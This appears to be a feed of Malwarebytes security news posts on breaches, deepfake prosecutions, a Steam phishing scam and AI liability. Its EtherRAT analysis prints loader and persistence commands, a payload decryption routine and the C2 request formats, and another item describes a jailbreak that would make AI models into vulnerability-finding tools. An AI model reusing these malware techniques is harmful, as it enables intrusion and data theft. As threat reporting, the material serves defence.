• Attackers can craft highly convincing emails, texts, or calls that reference specific procedures or monitoring episodes (for example, “about your recent Zio patch recording”) to trick patients into sharing more data or paying fake bills.
• The breached data can be used to create a fake identity, insurance fraud, or medical identity theft.
• Exposure of cardiac and other health‑related information can be deeply sensitive and may have employment/insurance ramifications, especially if data is posted publicly or sold to data brokers.

Healthcare breach data tends to circulate for years, and victims may face sporadic fraud and phishing attempts long after the headlines fade.

How to stay safe

If you’ve used iRhythm’s services, keep an eye on your post, email, and patient portals for official breach notifications from iRhythm or your healthcare provider.

In the US, breaches of protected health information that meet certain criteria must be reported to patients and regulators. iRhythm has promised to “notify individuals affected by this incident in accordance with applicable law and take steps as needed to protect and remediate the impact to them.”

To stay out of the hands of phishers and scammers:

• When you receive a communication about the data breach, verify through other channels that it really came from iRhythm. Go directly to iRhythm’s official website or patient portal, or call a known phone number to confirm the communication is genuine.
• Be extra suspicious of emails or texts that claim to offer compensation, refunds, or other financial consequences related to this incident.
• Change passwords for your iRhythm‑linked portals and your cardiology or hospital patient portals, especially if you reused those passwords elsewhere.
• Log into your health insurer’s portal and check claims on a regular basis.
• If you see anything suspicious, report it immediately to your insurer and provider and ask them to flag your account for possible identity theft.
• Do not provide personal or financial information over the phone just because the caller knows details about you which they may have obtained from the stolen data.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

Thanks to Uncle Sam, anyone trying to find nonconsensual intimate deepfakes on CFake.com and SOCFake.com will be disappointed. The US Departments of Justice (DOJ) and Homeland Security has seized the two domain names under the TAKE IT DOWN Act.

The TAKE IT DOWN Act, signed in May 2025, is the first US federal statute criminalizing the publication of nonconsensual intimate imagery, including AI-generated forgeries. It imposes penalties of up to two years’ imprisonment, gives covered platforms 48 hours to remove flagged content, and grants the forfeiture powers the DOJ just used.

According to the seizure warrants, the digital forgeries depicted “politicians, first ladies of multiple countries, royalty, journalists, television presenters, athletes, entertainers, and others,” and visitors could browse them under tags including “rape,” “forced,” and “degradation”.

The authorities didn’t just snag the sites, though. They got the alleged operator of CFake.com, in an international effort.

The US alerted the Paris prosecutor’s office to a French national in Nice who was allegedly running CFake.com. French investigators counted roughly 300,000 images and 7,000 videos depicting 14,000 people across CFake.com, drawing four million monthly views from 200,000 user accounts.

They then arrested the IT professional, who had no prior criminal record. They also found around $64,000 in Ether cryptocurrency at his home in advertising revenue from the site.

The man will be tried on July 7 in Paris for carrying out illicit transactions online and providing nonconsensual sexual deepfakes. The former offence carries a potential seven years’ imprisonment and a €500,000 (approximately $580,000) fine. The latter could yield three years and a €75,000 ($87,000) fine.

Providers and accused providers of nonconsensual intimate deepfakes have also been held in the US. In April, James Strahler II from Ohio pleaded guilty to cyberstalking, producing child sexual abuse material, and publishing digital forgeries.

Strahler had downloaded produced over 700 images and animations posted to a child sexual abuse site, and had sent deepfake material to at least six adult women, including one sent to a victim’s coworkers.

Last month, the DoJ also arrested Cornelius Shannon and Arturo Hernandez under the TAKE IT DOWN Act for publishing thousands of deepfake images of prominent women and those not in the public eye.

Other countries are also taking action. Anthony Rontondo was arrested by Australian authorities in May last year for posting deepfaked pictures of prominent Australian women. He eventually received an AU$343,000 fine.

How prevalent are deepfakes?

These seizures and prosecutions are encouraging, but prosecutors trying to force non-consensual deepfakes offline face a rising tide of such material. Requests for and sharing of nonconsensual deepfake imagery have risen, with activity migrating across platforms. Deepfake incidents overall jumped 257% in 2024, and girls accounted for 94% of victims in reported AI-generated child sexual abuse cases.

Seizing a distribution point removes a storefront. It does not remove the AI models used to produce the material, the anonymous hosting providers downstream, or the demand that draws visitors in the first place.

What you can do

If you or someone you know are depicted in a nonconsensual deepfake, keep dated screenshots, URLs, and any communications as evidence before filing a takedown request and reporting it to the authorities.

Limit the high-resolution face images you and your children post publicly, since school portraits and social media profile pictures are the raw material these tools need.

Take advantage of expert advice to help protect yourself from non-consensual deepfakes:

• Cyber Civil Rights Safety Initiative Safety Center (US)
• Revenge Porn Helpline (UK)
• Cybertip.ca (Canada)

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

During our recent threat hunting activities, we found EtherRAT malware being distributed by a website with a strange homepage. This homepage allowed us to discover a vast malicious infrastructure distributing malware, malicious documents, remote desktop software, and phishing pages. 

EtherRAT is a RAT developed in Node.js which allows an attacker to gain complete control over the machine and execute arbitrary code returned by the Command and Control (C2) server. The malware uses the Etherium blockchain to obtain the C2 server, hence the “Ether” part of the name. EtherRAT is typically distributed via MSI, PowerShell, or JavaScript scripts. 

An open directory that distributes EtherRAT: where it all began 

While threat hunting, we found an open directory that was distributing MSI installers and PowerShell scripts, which ultimately distributed EtherRAT. In the analyzed cases, the PowerShell scripts and MSI installers were distributed from a “/install” folder.  The versions have a progressive number, ranging from v1 to v10. 

Open Directory hosting EtherRAT MSI 

The returned home page caught our attention and prompted us to further explore the campaign. 

The homepage returned by the EtherRAT distribution website 

Analyzing domains and associated IPs with the EtherRAT distribution, we detected other similar home pages with a hacking-style theme. They appeared to belong to a larger distribution chain, which also distributes phishing, remote control software, and other malware. These websites usually have several folders with malware and phishing related content, and what is displayed depends on the specific infection chain. 

Different websites that resolve to the same IP addresses have previously returned pages related to fake companies or default templates. The use of these new pages could therefore be a method to make detection more difficult for automated scanners or researchers.  Here are some of the home pages we found:

Some of the malicious websites indexed on Google 

EtherRAT is an interesting RAT, as it has few lines of code and allows the execution of arbitrary code returned by the C2 server. Furthermore, using the Ethereum blockchain to obtain the C2 server makes it more resilient to infrastructure takedowns. 

Technical analysis of EtherRAT 

The detected websites usually distribute an MSI or PowerShell script with the version name, such as v1.msi, v2.ps1, and so on. 

MSI Loader 

The MSI file “v9.msi” contains three components: 

MSI Filename Description KmPuGimn.cmd BAT launcher cDQMlQAru0.xml First Jscript loader MRaQCipBIZeiZNx.log Encrypted EtherRAT 

When the MSI is executed, the “KmPuGimn.cmd” file is started: 

conhost --headless cmd /c "KmPuGimn.cmd" 

This obfuscated BAT file performs different operations: 

• Extracts the other files in a random folder in %LOCALAPPDATA%. 
• Re-executes itself via: 
  • %SystemRoot%\System32\conhost.exe –headless %SystemRoot%\System32\cmd.exe /c call “C:\Users\{user}\AppData\Local\{random_path}\KmPuGimn.cmd” nKWa 
• Runs the command “where node” to find an existing installation. 
• Downloads Node.js if it’s not found 
  • Uses “curl -sLo” to download Node.js from the official website. 
  • Extracts to installation directory via “tar -xf”. 
  • Renames extracted directory to “28Q75h”.
• Loops until both “MRaQCipBIZeiZNx.log” and “cDQMlQAru0.xml” exist, then executes: 
  • conhost.exe –headless C:\Users\{user}\AppData\Local\{random_path}\{random_path}\node.exe cDQMlQAru0.xml 

The executed “cDQMlQAru0.xml” is a loader that decrypts the embedded code with a XOR function and then executes it with “vm.compileFunction”. 

decrypted[i] = (encrypted[i] - key[i % key.length] - i) & 0xFF  The embedded decrypted code 

The decrypted code: 

• Copies node.exe in “C:\Users\{user}\AppData\Local\{random_path}\{random_path}\_MJlLlt5.exe”. 
• Adds a registry key for persistence with “conhost.exe –headless”. 
• Decrypts “MRaQCipBIZeiZNx.log” and executes it with “_MJlLlt5.exe” stdin. 

The decryption algorithm is a custom stream-like decoding routing based on XOR, byte rotations and an accumulator: 

for e in range(len(data)):      byte = data[e]      g = prev      prev = byte      byte = (byte - g) & 0xff      byte = byte ^ n[e % len(n)] ^ ((e >> 8) & 0xff)      byte = si[byte]      byte = (byte - k[e % len(k)]) & 0xff     result[e] = byte 

The final stage is to deploy EtherRAT. EtherRAT allows the attacker to: 

• Execute arbitrary JavaScript code received by the C2 server. This allows the attacker to execute new commands, perform operations on files and folders, modify the registry, and exfiltrate data. 
• Get a new C2 server using the Ethereum blockchain. 
• Reobfuscate itself. 
• Save the logs to “svchost.log”. 

Part of decrypted EtherRAT code 

The EtherRAT uses Ethereum’s “eth_call” JSON-RPC method to retrieve the active C2 URL from a smart contract on the Ethereum mainnet.  

The blockchain parameters in this case are: 

• Contract: 0x88ea8d0bc4146f0a018e989df3fd089ac48f9a58 
• Function selector: 0x7d434425 
• Argument: 0xf6a772e163e64b07f658946f863b5d457d88f9f0 

The decoded C2 from Ethereum blockchain 

The contacted URLs to obtain the C2 server endpoint are: 

• mainnet[.]gateway[.]tenderly[.]co 
• rpc[.]flashbots[.]net/fast 
• rpc[.]mevblocker[.]io 
• eth-mainnet[.]public[.]blastapi[.]io 
• ethereum-rpc[.]publicnode[.]com 
• eth[.]drpc[.]org 
• eth[.]merkle[.]io 

Polling requests use randomized URL patterns based on some parameters defined in the code: 

GET /api/<4-byte-hex>/<victim-uuid>/<4-byte-hex>.<ext>?<param>=<build-id>  X-Bot-Server: <c2_url> 

In the analyzed sample, the parameters are: 

• Build ID: “6f816d80-0d6c-4384-9cd6-6b79965fc08f” 
• ext: randomly selected from “png”, “jpg”, “gif”, “css”, “ico”, “webp”. 
• param: randomly selected from “id”, “token”, “key”, “b”, “q”, “s”, “v”. 

After startup, the RAT sends its own source code to the C2 server. The C2 responds with a newly obfuscated version of the script, which is written back to disk, making each execution generate a new file hash. 

POST /api/[REOBF_PATH]/<victim-uuid>  Body: { "code": "<current_script_contents>", "build": "<build_id>" } 

After the EtherRAT execution, we observed different post-compromised cmd.exe activities to check the environment. For example: 

• powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_VideoController).Name”
• reg query “HKLM\SOFTWARE\Microsoft\Cryptography” /v MachineGuid 
• powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_ComputerSystem).Domain” 
• powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_ComputerSystem).PartOfDomain” 
• cmd.exe /d /s /c “net session” 

EtherRAT logs  PowerShell Loader 

The activities performed by the PowerShell loaders are very similar to the last stage of the JS script of the MSI installer: 

• Downloads Node.js if it’s not present. 
• Create the necessary directories. 
• Decode the EtherRAT with a custom decryption algorithm. 
• Execute Node.js with conhost.exe and the decrypted EtherRAT payload. 

We detected some variants of the PowerShell loader hosted on these websites; namely that the functions’ names and the decryption functions change in the analyzed PowerShell scripts. 

The decryption of EtherRAT payload with the custom decryption algorithm  Tracking the malicious infrastructure 

When we analyzed the different websites with the “hacking-theme” pages, we found that in the past many had hosted multiple phishing pages in some specific paths. For example: 

• /zht/sharep-redirect.html 
• /bl/me.php 
• /t/teams 
• /teams/Windows/invite.php 

It seems that these domains and IPs are actually part of a much larger infrastructure that distributes malware, phishing, malicious documents, and remote software. It is possible that these infrastructures are shared by multiple threat actors who activate different URL endpoints based on the specific campaign. 

Interestingly, the majority of the domains related to this malicious infrastructure in the past also returned an HTML page related to a “Bulletproof Infrastructure” service.  

We found that these phishing campaigns typically start via emails with documents attached, such as PDF or Excel files. These documents ask the user to click a link to view another document. Below are two examples of the phishing documents attached to the emails:

These phishing pages typically ask the user to enter their email address, then continue the infection chain and distribute phishing or malware pages.  Below are some of the phishing pages detected within the malicious infrastructure:

Misconfigurations exposed the phishing kits 

While tracking malicious websites, we found one with an open directory containing part of the phishing kit used in the campaigns. 

Open directory hosting part of phishing kits

 

The open directory contained several folders with code and pages related to the phishing campaigns. 

Phishing kit code 

Additionally, some domains were misconfigured and allowed the download of “cl.zip”, which contained the source code for the “URL Cloaker” pages. 

Part of “URL Cloaker” code  Indicators of Compromise (IOCs)   IPs 

82[.]165[.]65[.]244: malicious infrastructure  

185[.]221[.]216[.]121: malicious infrastructure  

43[.]163[.]233[.]166: malicious infrastructure  

40[.]160[.]238[.]30: malicious infrastructure  

159[.]89[.]227[.]204: malicious infrastructure  

57[.]128[.]31[.]168: malicious infrastructure  

Domains 

ivorilla[.]cloud: EtherRAT distribution  

mx[.]nrlwz[.]com: EtherRAT distribution  

dn[.]eyqwj[.]com: EtherRAT distribution  

bi[.]mkrjcsw[.]com: EtherRAT distribution  

dorqen[.]casa: EtherRAT distribution  

kelvra[.]club: EtherRAT distribution  

cambioefectivo[.]com: EtherRAT C2  

vabelles[.]com: EtherRAT C2  

tranzed[.]org: EtherRAT C2  

kibrisarazi[.]com: EtherRAT C2  

aravisblog[.]com: EtherRAT C2  

publicspeakingtip[.]org: EtherRAT C2  

Acknowledgements 

• EtherRAT: https://atos.net/en/lp/cybershield/etherrat-distribution-spoofing-administrative-tools-via-github-facades 

• SharePoint reference: https://ironscales.com/threat-intelligence/no-macro-xlsx-shared-strings-aitm-redirect-credential-harvest 

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

Anthropic has been ordered by the US government to cut off its newest Claude Fable 5 and Mythos 5 models for fear of abuse by adversaries.

Reuters reports that Anthropic said it will “abruptly ​disable” its most advanced AI models for all users after the US government ordered it to suspend access to the models for foreign nationals, citing national security ‌concerns.

Officials reportedly believe a jailbreak could turn Fable 5 and Mythos 5 into vulnerability-discovery tools for adversaries, so Anthropic says it is disabling them worldwide rather than try to nationality‑filter access, since it is virtually impossible to verify every user’s nationality.

In a statement on its website, Anthropic says:

“The letter did not provide specific details of its national security concern. Our understanding is that the government believes it has become aware of a method of bypassing, or “jailbreaking” Fable 5. We reviewed a demonstration of this specific technique being used to identify a small number of previously known, minor vulnerabilities. These vulnerabilities all appear relatively simple, and we have found that other publicly-available models are able to discover them as well without requiring a bypass.”

Mythos 5 is the non-public full version, which is currently used only by government agencies and selected corporate partners to harden their systems. Fable 5 is a Mythos-class model that should supposedly be safe for general use.

It makes sense to me that if Fable 5 is easy to jailbreak, that it should fall under the same restrictions as Mythos 5. However, Anthropic maintains that it has built-in safeguards that mean queries on some topics will instead receive a response from the next-most-capable model, Claude Opus 4.8. 

The relationship between the US government and Anthropic had shown signs of easing in parts of the US government after tensions over military use, surveillance, and autonomous weapons. In March, defense Secretary Pete Hegseth designated the San Francisco-based company a “supply-chain risk to national security.”

To understand the nature of the argument, it is necessary to understand that Mythos 5 is described in multiple reports as particularly effective at identifying software vulnerabilities, including long‑standing bugs in complex, legacy systems such as those in banking and other critical infrastructure. Many view this as dual‑use: great for defense hardening, but catastrophic in the wrong hands.

In recent updates from major software vendors like Microsoft and Google, we’ve seen a growth in numbers of patched vulnerabilities after the vendors began using AI-guided search for new vulnerabilities in their own software. We also know that Mozilla found over 270 Firefox vulnerabilities with the aid of Anthropic’s new Claude Mythos model. 

What this means

In the wrong hands these vulnerabilities could definitely do a lot of harm. So, it looks like it will take some time before regular consumers and developers will gain access to Fable 5 and Mythos 5 entirely. However, existing Anthropic models (older Claude variants) remain available.

For home users who were simply chatting with Claude or using it to help with basic scripting, the change will mostly show up as “this specific version is unavailable” rather than a broader AI blackout.

Removing a high‑end vulnerability‑finding model from broad circulation increases the effort required for less‑resourced cybercriminals to automate discovery of complex bugs in consumer‑facing software and services only by so much. There are other models available on the black market that might be just as effective. And for most cybercriminals, turning a vulnerability into a method they can utilize in an exploit is much more relevant.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

This week on the Lock and Code podcast…

If you weren’t taking deepfakes seriously before, it’s too late now to ignore them.

According to new research from Malwarebytes, one in three people who use AI every day said it’s okay to generate pornography of people without their consent.

Nearly 10 years ago, “deepfake” technology provided hobbyists and film editors with artificial intelligence (AI) tools to swap the face of one person onto the body of another. In its infancy, this technology brought silly film experiments like swapping Tom Cruise in Mission Impossible with Keanu Reeves. Today, this same technology produces something far more harmful—fake nude images of teenagers.

On the Lock and Code podcast today with host David Ruiz, we are re-visiting an interview from 2024, in which we spoke with a lawyer named David Chiu about his lawsuit against 16 deepfake nude generation websites.

The websites named in that lawsuit often needed just one image of a person to generate fake pornography. And while nearly everyone has at least one image of themselves online, even if they had hundreds, the path towards deletion is somewhat understood—start by deactivating and deleting popular social media accounts. But for teenagers today, raised mostly online, and who share images directly with friends and boyfriends and girlfriends and exes, it’s likely impossible to remove every visual trace of themselves. Also, they shouldn’t have to face this problem alone.

The Lock and Code podcast frequently discusses structural problems that require individual management. You have to skirt corporate data collection. You have to find the automated license plate readers in your hometown. You have to review every single message you get with a certain antagonism, to guard yourself against scams.

So, it’s rare to encounter a solution that benefits more than one person.

Chiu serves as the City Attorney for San Francisco, which means his department can file a lawsuit on behalf of not just the people of San Francisco, but also California, and that’s what his team did in going after the deepfake websites.

Since then, Chiu’s department has shut down 10 deepfake nude websites, and it received a settlement agreement from a company called Briver LLC to no longer operate any website that creates nonconsensual deepfake pornography.

And, as California goes, so goes the nation.

In May of last year, the Take It Down Act became effective as law in the United States, which criminalizes “revenge porn” and AI-generated nonconsensual intimate imagery. The law is not perfect but so far it is being used as intended. Last month, two men in the US were among the first to be charged with violating the Take It Down act for allegedly creating deepfake nudes that, according to the AP, “included both celebrities as well as private women, including recent high school graduates.”

Today, we revisit our conversation with San Francisco City Attorney David Chiu about the important fight against deepfake porn and the clear threat that his department found against the public.

“At least one of these websites specifically promotes the non-consensual nature of this. So, and I’ll just quote, ‘Imagine wasting time taking her out on dates when you can just use website X to get her nudes.'”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium Security for Lock and Code listeners.

Last week on Malwarebytes Labs:

• Stolen iPhones could soon be worth a lot less to thieves
• Fake verification pages are stealing Steam accounts from players
• Google can be liable for false AI Overviews, court rules
• VRChat says reported data breach never happened
• Children’s phones must block nude images by September, UK says
• Free Spotify Premium hacks on social media are spreading infostealers
• Microsoft’s biggest-ever Patch Tuesday fixes 206 bugs, including 3 zero-days
• 88% of people struggle to tell what’s real online
• Meta’s face-recognition code raises new concerns about smart glasses
• Scammers love Meta, according to Lloyds Bank
• Update Chrome: Google patches actively exploited vulnerability and 73 others
• Americans lost nearly $900 million to AI-powered scams, FBI says
• Pirated PC games are delivering password-stealing malware

Stay safe!

Something feel off? Check it before you click.  

Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

Try it free → 

The UK’s Metropolitan Police has reached an agreement with Apple designed to make stolen iPhones harder to resell and less attractive to thieves. The approach combines stronger technical protections with direct data sharing between Apple and law enforcement.

In 2023, about 1.4 million mobile phones were stolen in the US alone. London is reportedly one of the worst cities for phone theft, with around 200 devices stolen every day. 

As part of this effort, Apple has strengthened its Stolen Device Protection feature in iOS 26.4, making it harder for thieves to change security settings, factory‑reset a stolen iPhone, or set it up as new.

Previously, thieves with your passcode (or who snatched your iPhone while it was still unlocked) could factory reset it, wiping your account and making the device look new for resale. Stolen Device Protection blocks this, requiring biometric authentication, not just a passcode, to make critical changes.

The Met has started sharing identifiers for reported stolen devices with Apple. In return, Apple can provide data on whether those devices later attempt to reconnect to a network or attempt to be reactivated.

Police say this gives them a better picture of what happens to stolen devices: Are they being switched back on locally? Shipped abroad? Broken down for parts?

Met Police Commissioner Sir Mark Rowley said Apple believes it has “cracked” the engineering problem. Phone thefts in London have since fallen 18% year-on-year, with Westminster (the capital’s worst-affected borough) down 45.8%.

Given the early signs of success, the Met is pressing for broader changes.

The Commissioner has written to the Home Secretary asking for laws that would require all phone manufacturers and mobile operators to share information about stolen devices and implement measures that make stolen handsets unusable. 

As part of that effort, the Met has explicitly said that Samsung and Google are also improving device security to address phone theft, suggesting this will become an industry‑wide expectation rather than an Apple‑only initiative.

Possible pitfalls

From a privacy perspective, it’s important to keep an eye on what data is shared, and who can see it.

Reports so far suggest that Apple and the Met are exchanging device identifiers and high‑level information about whether a stolen phone has attempted to reconnect or be reactivated. In theory, that sounds narrow and purpose‑bound: device X was reported stolen, later tried to come online in country Y, at time Z. There is no public indication that content, contacts, or location histories are being handed over wholesale.

There’s also a risk of someone reporting your phone as stolen. If a device is incorrectly marked as stolen, the protections designed to stop thieves could lock an innocent user out, turning a valuable asset into a brick. Without transparent appeal mechanisms, this is a notable concern.

The measures could also create challenges for recycling initiatives, legitimate repair shops, and refurbishers. They may face additional hurdles when diagnosing, restoring, or reselling devices if anti-theft protections become more restrictive.

Stay safe

Make sure your phone is protected with a strong passcode and biometric security, such as Face ID or a fingerprint.

Enable Apple’s Find My feature, or the Android equivalent, and make sure it is linked to a strong account password.

Keep lock screen notifications to a minimum so thieves cannot quickly access your sensitive information if they get hold of your device.

When buying a used phone, use a reputable seller and make sure the device has been reset by its owner. Complete the initial setup process with the seller present to confirm the phone isn’t locked to someone else’s account or reported stolen.

Scammers know more about you than you think. 

Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in. 

Download for iOS → Download for Android → 

Online gamers should watch out for a convincing scam that aims to steal your Steam account.

The scam uses fake FACEIT verification pages that look legitimate, complete with official branding, working links, and what appears to be a real Steam login window. By the time it asks for your password, many victims are convinced they’re interacting with a genuine service.

The goal is to steal your Steam account.

Why this scam targets FACEIT players

If you’re not a competitive gamer, FACEIT might not mean anything to you. But to millions of people, it’s a big deal, and that makes it a target for impersonation by cybercriminals.

FACEIT is one of the largest competitive gaming platforms for Counter-Strike 2 (CS2). Millions of players use it for ranked matches, tournaments, leagues, and advanced anti-cheat protections.

To use FACEIT, players typically connect their Steam platform accounts, which are valuable for scammers.

A stolen Steam account can contain:

• Hundreds or thousands of dollars’ worth of purchased games
• Valuable CS2 skins and items, some worth significant amounts of real money
• Wallet funds and saved payment methods
• Years of friends, messages, and community reputation

Once criminals gain access, they can steal items, scam friends, or sell the account on criminal marketplaces.

Because FACEIT connects to Steam, a fake “FACEIT verification” page is an easy way to trick people. Victims think they’re updating their account, but attackers are really trying to steal Steam accounts that may contain valuable games, skins, and wallet funds. Gamers are especially vulnerable because they’re used to linking accounts and following verification steps, and may act quickly if they think their access to a game is at risk.

How the scam works

The attack starts with a website that looks like an official FACEIT page. The scam pages are likely distributed through the same channels gamers use every day: community forums, chat servers, social media posts, and direct messages.

The page claims FACEIT is offering free, optional identity verification to help build a more trusted community. It’s polished, uses the correct branding, and even includes working links to FACEIT’s real blog and support pages. Everything about it is designed to make you think you’re on a genuine FACEIT website, but you’re not.

Fake FACEIT verification page

Instead of using the official faceit.com domain, the scammers use lookalike addresses such as:

• faceit-discord.com
• faceit-clubs-verify.com
• faceit-verification-clubs.com

The extra words like “verification” or “discord,” are designed to make these addresses look legitimate at a glance, but they’re sites that are controlled by cybercriminals.

Many of these domains are only days or even hours old. Scammers constantly register new ones, knowing they’ll likely be blocked eventually. That’s why a site not being flagged as dangerous doesn’t mean it’s safe.

There are small clues, though. In one example, the page listed both “Copyright 2024” and “Copyright 2025.” Legitimate companies rarely make mistakes like that, but scam sites often do.

After the verification pitch, the page claims there’s a problem with your CS2 account and asks you to update your information to prove you’re not a cheater or using a smurf account.

Here’s the clever part. The QR code appears blurry and difficult to scan. Researchers believe that’s intentional. After a few failed attempts, many users are likely to give up and click the easier-looking “Sign in through Steam” button instead.

The broken QR code is the nudge that guides victims toward the part of the page where the real theft happens.

Fake FACEIT page with a blurry QR code and “Sign in with Steam” button

When users eventually give up on the QR code and click the button, a Steam login window appears. It looks convincing, complete with the Steam logo, login fields, and what appears to be a steamcommunity.com address bar.

But the window is fake.

Fake Steam sign-in window steals your account details

Instead of opening a real Steam login page, the scammers display a convincing copy inside the website itself. Security researchers call this a Browser-in-the-Browser attack. The fake window looks and behaves like a genuine browser pop-up, but the address bar is just part of the image.

Anything entered into the form goes straight to the criminals. If the page also asks for a Steam Guard code, that gets stolen too, allowing attackers to access the account. Some victims are then tricked into “protecting” their items by transferring them to a friend or backup account, when they’re actually sending them directly to the scammers.

How to protect yourself against this scam

A few simple habits can stop this scam:

• Check the real address bar. FACEIT’s official website is faceit.com. Be wary of lookalike domains such as faceit-discord.com or faceit-clubs-verify.com. Remember: a login window inside a webpage can fake its own address bar. Trust the one at the top of your browser, not the one inside the page.
• Be suspicious of blurry QR codes. Researchers believe the QR code in this scam is deliberately blurred to push users toward the “Sign in through Steam” button instead.
• Treat urgency as a warning sign. Messages about account problems, verification, or losing access are designed to make you act quickly. Slow down and verify first.
• Go to the source. If you’re unsure whether FACEIT or Steam needs something from you, open the official website or app yourself rather than following links from Discord, messages, or ads.
• Add another layer of protection. Scam sites often look legitimate. Malwarebytes Browser Guard can help block known phishing pages and other online scams before you enter your username and password.
  

If you already entered your details

Change your Steam password immediately, make sure Steam Guard is enabled, and sign out of all other devices. Check your Steam API key settings and remove any key you don’t recognize. Change the password anywhere else you reused it and review your account for unauthorized trades or purchases.

Why this scam works

This scam works because it doesn’t look like a scam. The branding is convincing, the story makes sense, and even the Steam login window appears legitimate.

Most people know to check the address bar before entering a password. Browser-in-the-Browser attacks are designed to defeat that habit. Because the fake Steam window is built into the page itself, the criminals can make its address bar say whatever they want, including steamcommunity.com.

The safest approach is to be suspicious of any login window that appears inside another website. If you’re unsure, close the page and sign in to Steam the way you normally would, through the official app or by typing the address yourself.

That small pause, that refusal to take the convenient shortcut a page is pushing you toward, is all it takes to keep your account yours.

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

A German court has ruled that Google can be held directly responsible for defamatory claims produced by its AI Overviews. Basically, the court said that telling people they should double-check AI search results is not enough to deny liability for what those results say.

This kind of warning may not be enough

The Munich Regional Court issued a preliminary injunction against Google after two German publishers discovered that AI Overviews falsely portrayed them as involved in scams and “dubious business practices,” even though the linked articles did not support those claims.

The decision could echo far beyond Germany. The court effectively found that Google can be held directly liable for defamatory content generated by its AI Overviews. The court cut through the usual “it’s just AI, don’t trust it too much” messaging and made one thing clear: If you build a system that confidently smears people or companies, you may be responsible for what it says, even when the content was “hallucinated” by AI.

AI Overviews are not harmless suggestions. In this case, the court treated them as Google’s own statements, with all the legal baggage that comes with that.

When the publishers sent a cease-and-desist letter, Google did not promptly stop similar claims from appearing. That detail turned out to be crucial in the ruling. The court noted that, unlike traditional search results, which simply list third-party content, AI Overviews generate “independent, new, and substantive statements.”

And since only Google can adjust the models and the logic that create those statements, only Google can reliably stop the system from repeating the same or similar falsehoods. In this case, the court found that Google can be held responsible.

For years, search engines have enjoyed broad protection under the logic that some harmful content is unavoidable when indexing the open web at scale. Showing a search result does not mean endorsing it. The search engine is a channel, not a publisher.

That changes when an AI Overview summarizes, rephrases, and sometimes invents facts, then publishes them at the top of search results.

AI Overviews are an extra feature, not essential to how search works. However, the appeal of AI summaries is their fast, confident answers, which is exactly what makes them dangerous. When those answers are wrong, many users may not click through to check the sources.

The ruling is preliminary and may be appealed, but the signal is clear: AI search output is not magic dust that makes liability disappear. Disclaimers about possible mistakes may not be enough when a system is deployed at scale, creates new content, and is designed to be trusted.

By the numbers

Google AI Overviews are powered by Gemini, Google’s AI model. Like other AI systems, it can produce confident answers that are wrong or poorly supported.

Pew Research studied browsing data from hundreds of users and found that when an AI Overview appears on a Google results page, clicks to traditional search results drop from around 15% to about 8%. 

A New York Times analysis of AI Overviews found that they were accurate roughly nine out of ten times. But with Google processing more than five trillion searches a year, even a small error rate could mean millions of wrong answers.

And those mistakes are not always due to bad sources. Even when Google links to a page with the correct information, its AI can still produce a false answer. More than half of the accurate responses were classified as “ungrounded,” meaning the websites cited by the AI Overview did not fully support the information it provided.

The main lesson here is to double-check AI search responses. Don’t trust an answer just because it’s presented confidently and includes links.

Users can be steered toward real threats, or away from effective protections, simply because an AI system sounded convincing on a search page.

If you find false or defamatory AI summaries about yourself or your company, document them thoroughly. Take screenshots, save the search terms, file correction requests, and keep records of the platform’s response. Or the lack of one.

Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

VRChat, Inc. has filed a data breach notice revealing that the information of more than 2.4 million users was involved in a data breach.

According to the notice, VRChat experienced unauthorized access to some account data between May 10 and May 12, 2026. The access happened in VRChat’s cloud environment and involved user profile and login-related data.

The information exposed varied by account, but may have included:

• VRChat username
• Email address associated with the VRChat account
• VRChat+ subscription status
• Login history, including device information, hardware identifiers, and IP addresses

VRChat explicitly states that passwords, credit card numbers or other payment information, and government ID documents used for age verification were not compromised.

VRChat is a social platform designed primarily for virtual reality headsets, allowing users to interact with others through user-created 3D avatars and worlds. Users can access VRChat through Steam for PC, the Meta Quest Store, or as an Android app for compatible devices.

With no passwords or payment card data exposed, direct card fraud or immediate takeover of payment methods via this breach alone is unlikely. But even without passwords or card data, the combination of identifiers, emails, and IP/device data creates several risks for affected users.

Potential risks Phishing

Cybercriminals may use VRChat usernames and email addresses in targeted phishing attempts. For example, users may receive phishing emails or in‑platform messages claiming to be from “VRChat Support,” with fake security alerts or prompts to “confirm your age verification” via a malicious link.

Knowledge of VRChat+ subscription status could make scams more convincing. A scammer could send tailored lures like “billing issue with your VRChat+ subscription” or refund scams, which tend to have higher click-through rates among paying users.

Account take-over

Cybercriminals may combine usernames and email addresses from this breach with passwords stolen in other data breaches and try them against VRChat accounts. This technique, known as credential stuffing, takes advantage of people who reuse passwords across multiple sites.

Valuable accounts may then be sold to other players or used for scams.

Identity correlation

Steam and Meta user IDs linked to VRChat accounts can help cybercriminals connect identities across gaming and social platforms, especially if the same email or profile name is reused.

IP addresses, login history, device information, and other identifiers can also help build a more detailed advertising or tracking profile of a user.

How to stay safe

VRChat says it has implemented additional security controls and engaged professionals to monitor for further threats. If you were affected by the breach, here are some steps you can take to protect yourself:

